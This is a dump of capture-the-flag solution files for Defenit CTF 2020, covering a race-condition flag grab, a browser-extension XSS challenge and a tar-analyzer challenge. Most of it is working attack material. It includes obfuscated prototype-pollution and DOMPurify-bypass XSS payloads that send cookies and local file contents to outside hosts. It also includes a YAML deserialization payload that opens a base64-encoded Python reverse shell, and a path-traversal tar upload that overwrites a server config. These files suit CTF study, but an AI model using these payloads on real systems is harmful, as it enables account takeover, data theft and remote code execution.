33 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34 |     }
35 |     print(requests.get("http://fortune-cookie.ctf.defenit.kr/flag?favoriteNumber=6969", headers=headers).text)
36 | 
37 | th1, th2 = [], []
38 | 
39 | for i in range(100) :
40 |     th1.append(threading.Thread(target=overwrite_floor_func, args=()))
41 |     th2.append(threading.Thread(target=get_flag, args=()))
42 | 
43 | for i in range(100) :
44 |     th1[i].start()
45 | 
46 | for i in range(100) :
47 |     th2[i].start()


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web2-highlighter/tq.txt:
--------------------------------------------------------------------------------
  1 | 삽질했던거 정리
  2 | 
  3 | prob site : http://highlighter.ctf.defenit.kr/
  4 | 
  5 | 
  6 | function pwn(a,b) {
  7 |     var post = a;
  8 |     var keyword = b;
  9 |     chrome.runtime.sendMessage(
 10 |         { content: post, keyword },
 11 |         function (response) {
 12 |             console.log(response);
 13 |         }   
 14 |     );
 15 | }
 16 | 
 17 | ({})['__proto__']['__defineGetter__']('foo',function(){return 'x';})
 18 | 
 19 | pwn(`n`,`({})['__proto__']['__defineGetter__']('polluted',function(){return'xxx';})`);
 20 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return 'x';})`);
 21 | 
 22 | 
 23 | 
 24 | 
 25 | 
 26 | ({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='[payload]')})
 27 | 
 28 | 
 29 | 
 30 | 
 31 | step 1. prototype pollution
 32 | ({})['__proto__']['__defineGetter__']('polluted',function(){return'\x3cimg\x20src="x"\x20onerror=alert(1)>';})
 33 | 
 34 | 
 35 | 
 36 | 
 37 | 
 38 | 
 39 | step 2. dompurify bypass (SAFE_FOR_JQUERY : TRUE 일 때):
 40 | 
 41 | 
 42 | 
 43 | <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);alert"></script>
 44 | 
 45 | 
 46 | 
 47 | <svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
 48 | 
 49 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return(n('aaaa'));})
 50 | 
 51 | 
 52 | 
 53 | 
 54 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return'<img alt="<x" title="/><img src=x onerror=alert(1)>">';})`);
 55 | 
 56 | 
 57 | 
 58 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x3c\x78\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x22\x3e';})`);
 59 | 
 60 | 
 61 | 
 62 | 
 63 | 
 64 | 
 65 | step 3. xss :
 66 | 
 67 | #({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6f\x2f\x6f\x61\x75\x74\x68\x32\x2f\x72\x65\x76\x6f\x6b\x65\x3f\x63\x61\x6c\x6c\x62\x61\x63\x6b\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3b\x61\x6c\x65\x72\x74\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e')})
 68 | 
 69 | 
 70 | http://highlighter.ctf.defenit.kr/read?id=72#({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6f\x2f\x6f\x61\x75\x74\x68\x32\x2f\x72\x65\x76\x6f\x6b\x65\x3f\x63\x61\x6c\x6c\x62\x61\x63\x6b\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3b\x61\x6c\x65\x72\x74\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e')})
 71 | 
 72 | 
 73 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
 74 | 
 75 | 
 76 | 
 77 | 
 78 | reference :
 79 | 
 80 | 
 81 | https://blog.p6.is/bypassing-a-js-sandbox/
 82 | 
 83 | https://research.securitum.com/dompurify-bypass-using-mxss/
 84 | 
 85 | https://masatokinugawa.l0.cm/
 86 | 
 87 | 
 88 | 
 89 | 
 90 | 
 91 | 
 92 | 
 93 | --- 
 94 | 
 95 | payload
 96 | 
 97 | ({})['__proto__']['__defineGetter__']('foo',function(){return'<img alt="onerror=alert(1)//" title="/><img src=x xnerror="alert(1) span="<x" o>"';})
 98 | 
 99 | 
100 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
101 | 
102 | 
103 | 
104 | takeover admin account
105 | 
106 | \x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x60\x2f\x2f\x77\x69\x74\x68\x70\x68\x70\x2e\x63\x6f\x6d\x3a\x38\x30\x38\x30\x2f\x3f\x60\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22
107 | 
108 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x60\x2f\x2f\x77\x69\x74\x68\x70\x68\x70\x2e\x63\x6f\x6d\x3a\x38\x30\x38\x30\x2f\x3f\x60\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
109 | 
110 | http://highlighter.ctf.defenit.kr/read?id=34#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x65\x76\x61\x6c\x28\x61\x74\x6f\x62\x28\x60\x64\x6d\x46\x79\x49\x48\x4a\x6c\x63\x53\x41\x39\x49\x47\x35\x6c\x64\x79\x42\x59\x54\x55\x78\x49\x64\x48\x52\x77\x55\x6d\x56\x78\x64\x57\x56\x7a\x64\x43\x67\x70\x4f\x77\x70\x79\x5a\x58\x45\x75\x62\x33\x42\x6c\x62\x69\x67\x69\x52\x30\x56\x55\x49\x69\x77\x67\x49\x6d\x5a\x70\x62\x47\x55\x36\x4c\x79\x38\x76\x63\x6d\x56\x6b\x59\x57\x4e\x30\x5a\x57\x51\x76\x5a\x6d\x78\x68\x5a\x79\x49\x73\x49\x47\x5a\x68\x62\x48\x4e\x6c\x4b\x54\x73\x4b\x63\x6d\x56\x78\x4c\x6e\x4e\x6c\x62\x6d\x51\x6f\x4b\x54\x73\x4b\x62\x47\x39\x6a\x59\x58\x52\x70\x62\x32\x34\x39\x49\x6d\x68\x30\x64\x48\x41\x36\x4c\x79\x39\x33\x61\x58\x52\x6f\x63\x47\x68\x77\x4c\x6d\x4e\x76\x62\x54\x6f\x34\x4d\x44\x67\x77\x4c\x7a\x38\x69\x4b\x33\x4a\x6c\x63\x53\x35\x79\x5a\x58\x4e\x77\x62\x32\x35\x7a\x5a\x54\x73\x60\x29\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
111 | 
112 | <img alt="onerror=eval(atob(`dmFyIHJlcSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwpyZXEub3BlbigiR0VUIiwgImZpbGU6Ly8vcmVkYWN0ZWQvZmxhZyIsIGZhbHNlKTsKcmVxLnNlbmQoKTsKbG9jYXRpb249Imh0dHA6Ly93aXRocGhwLmNvbTo4MDgwLz8iK3JlcS5yZXNwb25zZTs`))//" title="/><img src=x xnerror="alert(1) span="<x" o>"
113 | 
114 | 
115 | http://highlighter.ctf.defenit.kr/read?id=30#({})['__proto__']['__defineGetter__']('foo',function(){return(e\
116 | val(atob(`dmFyIHJlcSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwpyZXEub3BlbigiR0VUIiwgImZpbGU6Ly8vcmVkYWN0ZWQvZmxhZyIsIGZhbHNlKTsKcmVxLnNlbmQoKTsKdmFyIHJlcTIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKcmVxMi5vcGVuKCJHRVQiLCAiaHR0cDovL3dpdGhwaHAuY29tOjgwODAvPyIrcmVxLnJlc3BvbnNlLCBmYWxzZSk7CnJlcTIuc2VuZCgpOw`)))})
117 | 
118 | 
119 | +
120 | 
121 | posix(출제자)의 정풀이
122 | 
123 | http://highlighter.ctf.defenit.kr/read?id=1#({})['__proto__']['__defineGetter__']('a',function(){return('\x3cstyle\x3e\x3cstyle/\x3e\x3cscript/src=https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(/ZnVuY3Rpb24gZmV0Y2hMb2NhbFJlc291cmNlKHVybCkgeyAgICAgICAgCiAgICBjb25zdCByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgICAgCiAgICByZXEub25sb2FkID0gZnVuY3Rpb24oKSB7CiAgICAgICAgY29uc3QgdGV4dCA9IHJlcS5yZXNwb25zZVRleHQ7ICAKICAgICAgICBmZXRjaCgnaHR0cDovL3A2LmlzOjg4ODgnLCB7Im1ldGhvZCI6ICJQT1NUIiwgImJvZHkiOiBlbmNvZGVVUkkodGV4dCl9KTsKICAgIH07ICAgIAogICAgcmVxLm9wZW4oJ0dFVCcsIHVybCk7CiAgICByZXEuc2VuZCgpOwp9OwoKZmV0Y2hMb2NhbFJlc291cmNlKCdmaWxlOi8vLycp/.source))\x3e\x3c/script\x3e');})


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/.COMMAND:
--------------------------------------------------------------------------------
1 | ../.././config.yaml0000666000000000000000000000071113667127342012136 0ustar  00000000000000!!python/object/apply:subprocess.Popen
2 | - !!python/tuple
3 |   - python
4 |   - -c
5 |   - "__import__('os').system(str(__import__('base64').b64decode('cHl0aG9uMyAtYyAiaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoJ3dpdGhwaHAuY29tJyw4MDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbJy9iaW4vc2gnLCctaSddKTsi').decode()))"


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/.SET_ADMIN:
--------------------------------------------------------------------------------
1 | LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5a2FYa211NDBwT0UySEh0SQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9Ii5IWVBBU1MiDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KDQouLi8uLi8uL2NvbmZpZy55YW1sAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDAwMDY2NgAwMDAwMDAwADAwMDAwMDAAMDAwMDAwMDAwNjQAMTM2NjY2NDEwNDAAMDEyMTMyACAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHVzdGFyICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAAMDAwMDAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGFsbG93X2hvc3Q6IDE4My4xMDIuMTQ1LjI0NAptZXNzYWdlOiBIZWxsbyBmb29vb29vIQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA